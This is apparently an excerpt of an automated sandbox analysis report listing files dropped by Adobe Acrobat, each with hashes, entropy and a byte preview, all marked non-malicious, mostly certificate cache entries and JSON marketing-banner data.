                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                          File Type:SQLite Rollback Journal
                                                                          Category:dropped
                                                                          Size (bytes):8720
                                                                          Entropy (8bit):3.7765812542413024
                                                                          Encrypted:false
                                                                          SSDEEP:48:7Mcp/E2ioyV59ioy9oWoy1Cwoy1UmKOioy1noy1AYoy1Wioy1hioybioyuFoy1nz:77pjuvFCXKQ9Cb9IVXEBodRBkq
                                                                          MD5:86D1E7F9145E7FBAA910B2653F18DD6A
                                                                          SHA1:0F2EF8D0029926F36A1A580DFA8E87790C6F0310
                                                                          SHA-256:4C60789971E8A126482077437C36B324CD4CB9D2B005DB82FC6AD5D4AAA7E178
                                                                          SHA-512:2A25F7D00AA4A7B9DBE9C5F9A4FE5732E291334429F8485B229101ACB8516DEBD0CA6674ED96FBB6731EB232369BB20270101A1BD5F019947B761E685CAAD27B
                                                                          Malicious:false
                                                                          Preview:.... .c......K.................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................T...[...b...r...t...}.....L..............................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                          C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\2D85F72862B55C4EADD9E66E06947F3D

                                                                          Download File
                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                          File Type:Certificate, Version=3
                                                                          Category:dropped
                                                                          Size (bytes):1391
                                                                          Entropy (8bit):7.705940075877404
                                                                          Encrypted:false
                                                                          SSDEEP:24:ooVdTH2NMU+I3E0Ulcrgdaf3sWrATrnkC4EmCUkmGMkfQo1fSZotWzD1:ooVguI3Kcx8WIzNeCUkJMmSuMX1
                                                                          MD5:0CD2F9E0DA1773E9ED864DA5E370E74E
                                                                          SHA1:CABD2A79A1076A31F21D253635CB039D4329A5E8
                                                                          SHA-256:96BCEC06264976F37460779ACF28C5A7CFE8A3C0AAE11A8FFCEE05C0BDDF08C6
                                                                          SHA-512:3B40F27E828323F5B91F8909883A78A21C86551761F27B38029FAAEC14AF5B7AA96FB9F9CC93EE201B5EB1D0FEF17B290747E8B839D2E49A8F36C5EBF3C7C910
                                                                          Malicious:false
                                                                          Preview:0..k0..S............@.YDc.c...0...*.H........0O1.0...U....US1)0'..U... Internet Security Research Group1.0...U....ISRG Root X10...150604110438Z..350604110438Z0O1.0...U....US1)0'..U... Internet Security Research Group1.0...U....ISRG Root X10.."0...*.H.............0..........$s..7.+W(.....8..n<.W.x.u...jn..O(..h.lD...c...k....1.!~.3<.H..y.....!.K...qiJffl.~<p..)"......K...~....G.|.H#S.8.O.o...IW..t../.8.{.p!.u.0<.....c...O..K~.....w...{J.L.%.p..)..S$........J.?..aQ.....cq...o[...\4ylv.;.by.../&.....................6....7..6u...r......I.....*.A..v........5/(.l....dwnG7..Y^h..r...A)>Y>.&.$...Z.L@.F....:Qn.;.}r...xY.>Qx....../..>{J.Ks......P.|C.t..t.....0.[q6....00\H..;..}`...).........A.......|.;F.H*..v.v..j.=...8.d..+..(.....B.".'].y...p..N..:..'Qn..d.3CO......B0@0...U...........0...U.......0....0...U......y.Y.{....s.....X..n0...*.H.............U.X....P.....i ')..au\.n...i/..VK..s.Y.!.~.Lq...`.9....!V..P.Y...Y.............b.E.f..|o..;.....'...}~.."......

                                                                          C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\2D85F72862B55C4EADD9E66E06947F3D

                                                                          Download File
                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                          File Type:data
                                                                          Category:dropped
                                                                          Size (bytes):192
                                                                          Entropy (8bit):2.7895108629891827
                                                                          Encrypted:false
                                                                          SSDEEP:3:kkFklm6WtzkXfllXlE/HT8k+MavNNX8RolJuRdxLlGB9lQRYwpDdt:kK/r9T88aNMa8RdWBwRd
                                                                          MD5:2B53FFE67A28C8D0A6A5C6713C332F17
                                                                          SHA1:0892A84A7C325C6B33927593FB7976A5DB92BF4C
                                                                          SHA-256:7ED5285E20865511F51BC895AC9BFCA09C1619549C40A6743BF16FBBDC1D1779
                                                                          SHA-512:8E4F4B75590442FF6F7FB918933B0A71314C020D0E474EC8B9EC5851FEFE508D3E3827B1717300BB404FAE60FBB3D9629002400EAD86D07CE2D0150CC86ECDBA
                                                                          Malicious:false
                                                                          Preview:p...... ...........H\C..(....................................................... ..........W....[)..............o...h.t.t.p.:././.x.1...i...l.e.n.c.r...o.r.g./...".6.4.c.d.6.6.5.4.-.5.6.f."...

                                                                          C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\ACROBAT_READER_MASTER_SURFACEID

                                                                          Download File
                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                          File Type:JSON data
                                                                          Category:dropped
                                                                          Size (bytes):295
                                                                          Entropy (8bit):5.352036029427962
                                                                          Encrypted:false
                                                                          SSDEEP:6:YEQXJ2HXW8Wu0VoZcg1vRcR0YlzDeoAvJM3g98kUwPeUkwRe9:YvXKXWHu1Zc0vYVGMbLUkee9
                                                                          MD5:117F6283833B1C7C41473EAAB48DD4C5
                                                                          SHA1:D6DD01C06E5BD9A60F498CAE5722D9A14D1D5F6A
                                                                          SHA-256:5A4B99ED0BA1DB65E69361543F6254A8A3D3FAA07634FE98722B9C585507836F
                                                                          SHA-512:C4566EC469760DFA188DAD5B55195FF7AB9D6552082887B68AA3F7CEBA9E2A68C19AFB9BFD09C7F4E0DC419507267A371C0049D7A2251D76765E0D8772D11535
                                                                          Malicious:false
                                                                          Preview:{"analyticsData":{"responseGUID":"ce904ce4-c803-4ecd-9dc3-673d26c2c517","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1733170438158,"statusCode":200,"surfaceID":"ACROBAT_READER_MASTER_SURFACEID","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                                          C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_FirstMile_Home_View_Surface

                                                                          Download File
                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                          File Type:JSON data
                                                                          Category:dropped
                                                                          Size (bytes):294
                                                                          Entropy (8bit):5.3004757007248315
                                                                          Encrypted:false
                                                                          SSDEEP:6:YEQXJ2HXW8Wu0VoZcg1vRcR0YlzDeoAvJfBoTfXpnrPeUkwRe9:YvXKXWHu1Zc0vYVGWTfXcUkee9
                                                                          MD5:845E06590C36804795104C4ADFD2D817
                                                                          SHA1:DE5C6A4882E1EC72F4CE425912421339287D39E3
                                                                          SHA-256:B7F1BBA0A08394AF95A76301052D5E450760B4607449B02A4BAB2FCA79B38699
                                                                          SHA-512:B4BA82FC3B9691DE526921192FD57AD7459A2D84E194E9769E53035ED729B2BEF307FDADAA29F089D79A3D61D75B8865E74359719A2A91E608EFB184A2509EE6
                                                                          Malicious:false
                                                                          Preview:{"analyticsData":{"responseGUID":"ce904ce4-c803-4ecd-9dc3-673d26c2c517","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1733170438158,"statusCode":200,"surfaceID":"DC_FirstMile_Home_View_Surface","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                                          C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_FirstMile_Right_Sec_Surface

                                                                          Download File
                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                          File Type:JSON data
                                                                          Category:dropped
                                                                          Size (bytes):294
                                                                          Entropy (8bit):5.277524442105083
                                                                          Encrypted:false
                                                                          SSDEEP:6:YEQXJ2HXW8Wu0VoZcg1vRcR0YlzDeoAvJfBD2G6UpnrPeUkwRe9:YvXKXWHu1Zc0vYVGR22cUkee9
                                                                          MD5:07CEE299BEA400A66DF20C18B829053C
                                                                          SHA1:484FEB7250646C31894332789DE07A2796FBC498
                                                                          SHA-256:684789B820E9DBDE1633F06EFE7E487BA9EC263111A7642AB401D45418F6D136
                                                                          SHA-512:9551CD111D52C95F38489D3F6EDE9DC97F2A05F484F74E4926483B4E475C15D0B83C6B3AB980AC7E67B6142C47D63051F7EE43A83E3E7B5D87C8900ED8105B71
                                                                          Malicious:false
                                                                          Preview:{"analyticsData":{"responseGUID":"ce904ce4-c803-4ecd-9dc3-673d26c2c517","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1733170438158,"statusCode":200,"surfaceID":"DC_FirstMile_Right_Sec_Surface","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                                          C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_READER_LAUNCH_CARD

                                                                          Download File
                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                          File Type:JSON data
                                                                          Category:dropped
                                                                          Size (bytes):285
                                                                          Entropy (8bit):5.338649084504202
                                                                          Encrypted:false
                                                                          SSDEEP:6:YEQXJ2HXW8Wu0VoZcg1vRcR0YlzDeoAvJfPmwrPeUkwRe9:YvXKXWHu1Zc0vYVGH56Ukee9
                                                                          MD5:2A3156FF55CC14EF7AD8606DFF7A7836
                                                                          SHA1:D6F05782191F16F98460C6F8437D39DAFE403BAC
                                                                          SHA-256:ECC217AD2493294603876334913DE66F49F6FA97C82402E86FCD50455DD44B24
                                                                          SHA-512:CE96AD3E08B351C0E2F704D724E5BF1E9BD606DAD7B51E6C38BEE6A80A38EC472E0E473C860A159134D70EB0C55E4F02205AFCE5B7C73E068A5766FC62737734
                                                                          Malicious:false
                                                                          Preview:{"analyticsData":{"responseGUID":"ce904ce4-c803-4ecd-9dc3-673d26c2c517","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1733170438158,"statusCode":200,"surfaceID":"DC_READER_LAUNCH_CARD","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                                          C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Convert_LHP_Banner

                                                                          Download File
                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                          File Type:JSON data
                                                                          Category:dropped
                                                                          Size (bytes):1123
                                                                          Entropy (8bit):5.683387990830654
                                                                          Encrypted:false
                                                                          SSDEEP:24:Yv6XP1zv1pLgE9cQx8LennAvzBvkn0RCmK8czOCCSX:Yv+9hgy6SAFv5Ah8cv/X
                                                                          MD5:492387835555A95F0CAE558769995145
                                                                          SHA1:46796FDC17412525803C3F066D559C885BAB369D
                                                                          SHA-256:E2D2793B6529EAA4B1AFCD6C1D81D809A841AEF3CDF49615E6E79DA4849FD7F7
                                                                          SHA-512:E0B22E48F68E1F1392E9C9113903297082CB29BED359F9648939B364946881F9F65C86F6E28F3B40F6A81BF2471FD62F47AF8209D4C721D1F7BBC18A5BF37940
                                                                          Malicious:false
                                                                          Preview:{"analyticsData":{"responseGUID":"ce904ce4-c803-4ecd-9dc3-673d26c2c517","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1733170438158,"statusCode":200,"surfaceID":"DC_Reader_Convert_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_Convert_LHP_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"93365_289436ActionBlock_1","campaignId":93365,"containerId":"1","controlGroupId":"","treatmentId":"d5bba1ae-6009-4d23-8886-fd4a474b8ac9","variationId":"289436"},"containerId":1,"containerLabel":"JSON for DC_Reader_Convert_LHP_Banner","content":{"data":"eyJjdGEiOnsidGV4dCI6IkZyZWUgdHJpYWwiLCJjbGljayI6Im9wZW5Ub29sIiwidG9vbF9pZCI6IkNvbnZlcnRQREZSZHJSSFBBcHAifSwidWkiOnsidGl0bGVfc3R5bGluZyI6eyJmb250X3NpemUiOiIxNHB4IiwiZm9udF9zdHlsZSI6IjAifSwiZGVzY3JpcHRpb25fc3R5bGluZyI6eyJmb250X3NpemUiOiIxMnB4IiwiZm9udF9zdHlsZSI6Ii0xIn0sInRpdGxlIjpudWxsLCJkZXNjcmlwdGlvbiI6IkV4cG9ydCBQREZzIHRvIE1pY3Jvc29mdCBXb3JkIGFuZCBFeGNlbC4ifSwidGNh

                                                                          C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Disc_LHP_Banner

                                                                          Download File
                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                          File Type:JSON data
                                                                          Category:dropped
                                                                          Size (bytes):1122
                                                                          Entropy (8bit):5.6775281238713955
                                                                          Encrypted:false
                                                                          SSDEEP:24:Yv6XP1zvZVLgEwcp06ybnAvz7xHn0RCmK8czOCYHfl8zdBy:Yv+hFgSNycJUAh8cvYHx
                                                                          MD5:ECFABE4952EEACE8E44C7AD7C7EBD787
                                                                          SHA1:49445121B578DC63AA626D2E61D185E4F37C9336
                                                                          SHA-256:B6B64E96E5231F7DC3F5C9686EA3087313BA3D300784A434BCEBC21E355F5308
                                                                          SHA-512:68CF4255A765FE1EFCA9559D3F692720483E63C3AE510721F2BD991B4E18C98652672B2372EC0DCD1C0AF1A337F770CA4927B2C4BDDEAB1C4CF9AA08B3EC59D4
                                                                          Malicious:false
                                                                          Preview:{"analyticsData":{"responseGUID":"ce904ce4-c803-4ecd-9dc3-673d26c2c517","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1733170438158,"statusCode":200,"surfaceID":"DC_Reader_Disc_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_Disc_LHP_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"93181_288855ActionBlock_0","campaignId":93181,"containerId":"1","controlGroupId":"","treatmentId":"1aad653c-ef44-43f7-be1c-3a2ba2cf2cfc","variationId":"288855"},"containerId":1,"containerLabel":"JSON for DC_Reader_Disc_LHP_Banner","content":{"data":"eyJjdGEiOnsidGV4dCI6IkZyZWUgdHJpYWwiLCJjbGljayI6Im9wZW5Ub29sIiwidG9vbF9pZCI6IlVwZ3JhZGVSSFBSZHJBcHAifSwidWkiOnsidGl0bGVfc3R5bGluZyI6eyJmb250X3NpemUiOiIxNHB4IiwiZm9udF9zdHlsZSI6IjAifSwiZGVzY3JpcHRpb25fc3R5bGluZyI6eyJmb250X3NpemUiOiIxMnB4IiwiZm9udF9zdHlsZSI6Ii0xIn0sInRpdGxlIjpudWxsLCJkZXNjcmlwdGlvbiI6IkNvbnZlcnQsIGVkaXQgYW5kIGUtc2lnblxuIFBERiBmb3JtcyAmIGFncmVlbWVudHMuIn0sInRjY

                                                                          C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Disc_LHP_Retention

                                                                          Download File
                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                          File Type:JSON data
                                                                          Category:dropped
                                                                          Size (bytes):292
                                                                          Entropy (8bit):5.285176708357948
                                                                          Encrypted:false
                                                                          SSDEEP:6:YEQXJ2HXW8Wu0VoZcg1vRcR0YlzDeoAvJfQ1rPeUkwRe9:YvXKXWHu1Zc0vYVGY16Ukee9
                                                                          MD5:C3C83015A96F6CD77CAEE86400528E5A
                                                                          SHA1:5CF0EF6ECCF472FEFEA6675B8777D349AF9658BA
                                                                          SHA-256:AAF79C12BA07D99CD395E20046B09CB818BA05D0ABA55CB21EB58BC589E67DC1
                                                                          SHA-512:C167CA1E3B47EA6F79F544945E07EA74689CBD8EA7062859F3B673D02978A35883CBB98EF83A05526EBCDA499D3B6DD5D5AEC01A57B414310E7719F8C14A5899
                                                                          Malicious:false
                                                                          Preview:{"analyticsData":{"responseGUID":"ce904ce4-c803-4ecd-9dc3-673d26c2c517","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1733170438158,"statusCode":200,"surfaceID":"DC_Reader_Disc_LHP_Retention","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                                          C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Edit_LHP_Banner

                                                                          Download File
                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                          File Type:JSON data
                                                                          Category:dropped
                                                                          Size (bytes):1102
                                                                          Entropy (8bit):5.667921348411401
                                                                          Encrypted:false
                                                                          SSDEEP:24:Yv6XP1zvI2LgErcXWl7y0nAvzIBcSJCBViVy:Yv+QogH47yfkB5kVX
                                                                          MD5:AC34685936D962DD957D6C02846E9086
                                                                          SHA1:FF3E1FCF2489542A0E750E09F16CB413B3682B52
                                                                          SHA-256:FFF261F2FD66C417A45172A45612028DD72C5BDA9BD4897FF031B4EBD2FBDDB9
                                                                          SHA-512:FC500590AF8C9DD7D4F40360FD0DB16398525E491B6D1A1AA88146A4BF2D688B11606CA3B232B5A1B6157F594481B09B1D10182F933E5396A51FCA45B08D2E6E
                                                                          Malicious:false
                                                                          Preview:{"analyticsData":{"responseGUID":"ce904ce4-c803-4ecd-9dc3-673d26c2c517","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1733170438158,"statusCode":200,"surfaceID":"DC_Reader_Edit_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_Edit_LHP_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"93181_288855ActionBlock_1","campaignId":93181,"containerId":"1","controlGroupId":"","treatmentId":"533ab5eb-b236-4889-89a5-ac002261d71e","variationId":"288855"},"containerId":1,"containerLabel":"JSON for DC_Reader_Edit_LHP_Banner","content":{"data":"eyJjdGEiOnsidGV4dCI6IkZyZWUgdHJpYWwiLCJjbGljayI6Im9wZW5Ub29sIiwidG9vbF9pZCI6IkVkaXRQREZSZHJBcHBGdWxsIn0sInVpIjp7InRpdGxlX3N0eWxpbmciOnsiZm9udF9zaXplIjoiMTRweCIsImZvbnRfc3R5bGUiOiIwIn0sImRlc2NyaXB0aW9uX3N0eWxpbmciOnsiZm9udF9zaXplIjoiMTJweCIsImZvbnRfc3R5bGUiOiItMSJ9LCJ0aXRsZSI6bnVsbCwiZGVzY3JpcHRpb24iOiJFZGl0IHRleHQsIGltYWdlcywgcGFnZXMsIGFuZCBtb3JlLiJ9LCJ0Y2F0SWQiOm51bGx9","da

                                                                          C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Home_LHP_Trial_Banner

                                                                          Download File
                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                          File Type:JSON data
                                                                          Category:dropped
                                                                          Size (bytes):1164
                                                                          Entropy (8bit):5.694700722115901
                                                                          Encrypted:false
                                                                          SSDEEP:24:Yv6XP1zvAKLgEfIcZVSkpsn264rS514ZjBrwloJTmcVIsrSK5y:Yv+YEgqprtrS5OZjSlwTmAfSKU
                                                                          MD5:CB0A97D8F58E1131AA30906C032CC283
                                                                          SHA1:79500ED410543BBDDD067B73D431E701B2F76BC8
                                                                          SHA-256:8CA261A648C6739EC6756C2D66134BED16ACC8EEDB0CB93B98BEDB2A8867F658
                                                                          SHA-512:70C00DCECA55171BCE26889A4A61883042B5F9A0557F33C2D91D8B72C8C2FA0B2E4A4A2A3BFD19EBAC7FF7C499BAAC57D3ABF788ECA0BA9782CD19EF24CED4E3
                                                                          Malicious:false
                                                                          Preview:{"analyticsData":{"responseGUID":"ce904ce4-c803-4ecd-9dc3-673d26c2c517","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1733170438158,"statusCode":200,"surfaceID":"DC_Reader_Home_LHP_Trial_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_Home_LHP_Trial_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"85531_264848ActionBlock_0","campaignId":85531,"containerId":"1","controlGroupId":"","treatmentId":"ee1a7497-76e7-43c2-bb63-9a0551e11d73","variationId":"264848"},"containerId":1,"containerLabel":"JSON for DC_Reader_Home_LHP_Trial_Banner","content":{"data":"eyJjdGEiOnsidGV4dCI6IlRyeSBBY3JvYmF0IFBybyJ9LCJ1aSI6eyJ0aXRsZV9zdHlsaW5nIjp7ImZvbnRfc2l6ZSI6IjE1cHgiLCJmb250X3N0eWxlIjoiMCJ9LCJkZXNjcmlwdGlvbl9zdHlsaW5nIjp7ImZvbnRfc2l6ZSI6IjEzcHgiLCJmb250X3N0eWxlIjoiLTEifSwidGl0bGUiOiJGcmVlIHRyaWFsIiwiZGVzY3JpcHRpb24iOiJHZXQgdW5saW1pdGVkIGFjY2VzcyB0b1xucHJlbWl1bSBQREYgYW5kIGUtc2lnbmluZ1xudG9vbHMuIn0sImJhbm5lcl9zdHlsaW5nIjo

                                                                          C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_More_LHP_Banner

                                                                          Download File
                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                          File Type:JSON data
                                                                          Category:dropped
                                                                          Size (bytes):289
                                                                          Entropy (8bit):5.289962880610495
                                                                          Encrypted:false
                                                                          SSDEEP:6:YEQXJ2HXW8Wu0VoZcg1vRcR0YlzDeoAvJfYdPeUkwRe9:YvXKXWHu1Zc0vYVGg8Ukee9
                                                                          MD5:F2AB3E6C7ED2C997561030326C8744FE
                                                                          SHA1:70E1E6A4FA79BF3FEEA3B9F1D771D396BD998903
                                                                          SHA-256:95DAAE5EAD1976980CD49CDF3103120350B4F7F7C2CD3B01431A0E406ED60DE9
                                                                          SHA-512:7CD487F5B4639683F3FEA53CB21FA58F220335503A6E8081A25C92C76856043422659EB709C1C60ACA7E983DAAF7CDF65C6F214C5BEBD3587AACE28C0A3490AF
                                                                          Malicious:false
                                                                          Preview:{"analyticsData":{"responseGUID":"ce904ce4-c803-4ecd-9dc3-673d26c2c517","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1733170438158,"statusCode":200,"surfaceID":"DC_Reader_More_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                                          C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_RHP_Banner

                                                                          Download File
                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                          File Type:JSON data
                                                                          Category:dropped
                                                                          Size (bytes):284
                                                                          Entropy (8bit):5.276417897205423
                                                                          Encrypted:false
                                                                          SSDEEP:6:YEQXJ2HXW8Wu0VoZcg1vRcR0YlzDeoAvJf+dPeUkwRe9:YvXKXWHu1Zc0vYVG28Ukee9
                                                                          MD5:87B925C7B51C65FD0A701B3FA4A6CB50
                                                                          SHA1:85B6C6A97904854FB1E83F3FD879DD37BD1437A5
                                                                          SHA-256:B520FAC3693C23FC72B8C32116BC35D434C2492EF0AA745BEEB4FBC1A8FAEE12
                                                                          SHA-512:E4E84F1DF8A83C6878F2FA0B3EF5CF6325452882651314D13BDE1A53460E9D803535E5A76C95EC8776D3568F72500E60C53765E98EF931983256E8E25D65049E
                                                                          Malicious:false
                                                                          Preview:{"analyticsData":{"responseGUID":"ce904ce4-c803-4ecd-9dc3-673d26c2c517","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1733170438158,"statusCode":200,"surfaceID":"DC_Reader_RHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                                          C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_RHP_Intent_Banner

                                                                          Download File
                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                          File Type:JSON data
                                                                          Category:dropped
                                                                          Size (bytes):291
                                                                          Entropy (8bit):5.273578961922776
                                                                          Encrypted:false
                                                                          SSDEEP:6:YEQXJ2HXW8Wu0VoZcg1vRcR0YlzDeoAvJfbPtdPeUkwRe9:YvXKXWHu1Zc0vYVGDV8Ukee9
                                                                          MD5:BB4DDC60D3103FF06E6AE0AA2C71222C
                                                                          SHA1:DB234291F89F836E5BB7E00B11CB353F6EAFEAA5
                                                                          SHA-256:DBC05691FC67792FF09F08DFED7455D524FEF7D3F919E477D58FB4B89D7CBBAF
                                                                          SHA-512:917987229ED321BE831F129FC5BC32EE8D38999B08FE91B6079A3BCEEC3775A5C570D23C5710B30814975002984FB756FD0844739286313E8F2F57679A072B71
                                                                          Malicious:false
                                                                          Preview:{"analyticsData":{"responseGUID":"ce904ce4-c803-4ecd-9dc3-673d26c2c517","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1733170438158,"statusCode":200,"surfaceID":"DC_Reader_RHP_Intent_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                                          C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_RHP_Retention

                                                                          Download File
                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                          File Type:JSON data
                                                                          Category:dropped
                                                                          Size (bytes):287
                                                                          Entropy (8bit):5.277441735747367
                                                                          Encrypted:false
                                                                          SSDEEP:6:YEQXJ2HXW8Wu0VoZcg1vRcR0YlzDeoAvJf21rPeUkwRe9:YvXKXWHu1Zc0vYVG+16Ukee9
                                                                          MD5:9880C9730672FD4D00E5074A55FCB4EC
                                                                          SHA1:600B91D0DAACAC345CD1E7263279A1913D751B81
                                                                          SHA-256:A62B8980D51A02AD8BEEA22B9CE43AC5D4D1E1408F7C8185853762DD365CD4D3
                                                                          SHA-512:29C2CB36CD8CD357A6204370A1B41AD47600D661853EC33F706384882944C4B675FBCF41D79F6685F7AF6E5AE5F92C4C03E41F8B045370B86E86F59027EDCCB4
                                                                          Malicious:false
                                                                          Preview:{"analyticsData":{"responseGUID":"ce904ce4-c803-4ecd-9dc3-673d26c2c517","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1733170438158,"statusCode":200,"surfaceID":"DC_Reader_RHP_Retention","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                                          C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Sign_LHP_Banner

                                                                          Download File
                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                          File Type:JSON data
                                                                          Category:dropped
                                                                          Size (bytes):1090
                                                                          Entropy (8bit):5.660817136334786
                                                                          Encrypted:false
                                                                          SSDEEP:24:Yv6XP1zvtamXayLgE+cNDxeNaqnAvz7xHn0RCmK8czOC/BSX:Yv+5BgkDMUJUAh8cvMX
                                                                          MD5:0359FF4822BFA729124DB131AA271243
                                                                          SHA1:66D03BC99B8CCAC7851ABA4C95153A28C922DDF5
                                                                          SHA-256:876ED02D8FAF093CA6DFD672FA6F76D3E298CCC8FDC15EED9DB274B532280653
                                                                          SHA-512:F310D27AB5E12EE0142DC0258C0B89522A1C667FBE54361DA9B04D204BB5277623400CDD4D02AC07AF84415E8E4296FB6C4B3F25A173A22F1FE18051415E4C57
                                                                          Malicious:false
                                                                          Preview:{"analyticsData":{"responseGUID":"ce904ce4-c803-4ecd-9dc3-673d26c2c517","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1733170438158,"statusCode":200,"surfaceID":"DC_Reader_Sign_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_Sign_LHP_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"93365_289436ActionBlock_0","campaignId":93365,"containerId":"1","controlGroupId":"","treatmentId":"266234d2-130d-426e-8466-c7a061db101f","variationId":"289436"},"containerId":1,"containerLabel":"JSON for DC_Reader_Sign_LHP_Banner","content":{"data":"eyJjdGEiOnsidGV4dCI6IkZyZWUgdHJpYWwiLCJjbGljayI6Im9wZW5Ub29sIiwidG9vbF9pZCI6IlVwZ3JhZGVSSFBSZHJBcHAifSwidWkiOnsidGl0bGVfc3R5bGluZyI6eyJmb250X3NpemUiOiIxNHB4IiwiZm9udF9zdHlsZSI6IjAifSwiZGVzY3JpcHRpb25fc3R5bGluZyI6eyJmb250X3NpemUiOiIxMnB4IiwiZm9udF9zdHlsZSI6Ii0xIn0sInRpdGxlIjpudWxsLCJkZXNjcmlwdGlvbiI6IkVhc2lseSBmaWxsIGFuZCBzaWduIFBERnMuIn0sInRjYXRJZCI6bnVsbH0=","dataType":"app

                                                                          C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Upsell_Cards

                                                                          Download File
                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                          File Type:JSON data
                                                                          Category:dropped
                                                                          Size (bytes):286
                                                                          Entropy (8bit):5.253133213007423
                                                                          Encrypted:false
